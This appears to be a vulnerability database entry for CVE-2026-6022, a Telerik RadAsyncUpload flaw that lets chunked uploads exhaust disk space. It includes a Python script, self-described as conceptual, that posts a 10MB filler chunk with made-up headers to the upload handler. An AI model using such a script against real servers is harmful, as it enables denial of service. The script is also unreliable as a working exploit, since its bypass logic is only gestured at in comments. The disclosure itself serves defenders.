Security Vulnerability Report
CVE-2026-6022 CVSS 7.5 HIGH

Published: 2026-04-22 08:16:13
Last Modified: 2026-05-05 18:39:55

Description

In Progress® Telerik® UI for AJAX prior to 2026.1.421, RadAsyncUpload contains an uncontrolled resource consumption vulnerability that allows file uploads to exceed the configured maximum size due to missing cumulative size enforcement during chunk reassembly, leading to disk space exhaustion.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Weakness
CWE-400 (Uncontrolled Resource Consumption)

Configurations (Affected Products)

cpe:2.3:a:progress:telerik_ui_for_asp.net_ajax:*:*:*:*:*:*:*:* - VULNERABLE
Progress® Telerik® UI for AJAX < 2026.1.421

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (Example)
# The endpoint usually looks like: /Telerik.Web.UI.WebResource.axd?type=rau or a specific handler
target_url = "http://target-site/Telerik.Web.UI.WebResource.axd?type=rau"

# Headers mimicking a Telerik chunked upload
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary",
    "X-File-Name": "exploit.dat",
    "X-File-Size": "999999999999",  # Misleading size or bypass logic
}

# Simulate sending chunks to exhaust disk
# Note: This is a conceptual PoC. Real exploitation depends on specific version parameters.
print("Sending malicious chunks to exhaust disk space...")
try:
    # Sending a large chunk
    data = "A" * 10 * 1024 * 1024  # 10MB chunk
    # In a real scenario, loop this and manipulate metadata to bypass single chunk checks
    response = requests.post(target_url, headers=headers, data=data)
    print(f"Response Status: {response.status_code}")
except Exception as e:
    print(f"Error: {e}")

References

Progress Telerik knowledge base article (Vendor Advisory, Mitigation): https://www.telerik.com/products/aspnet-ajax/documentation/knowledge-base/kb-security-uncontrolled-resource-consumption-cve-2026-6022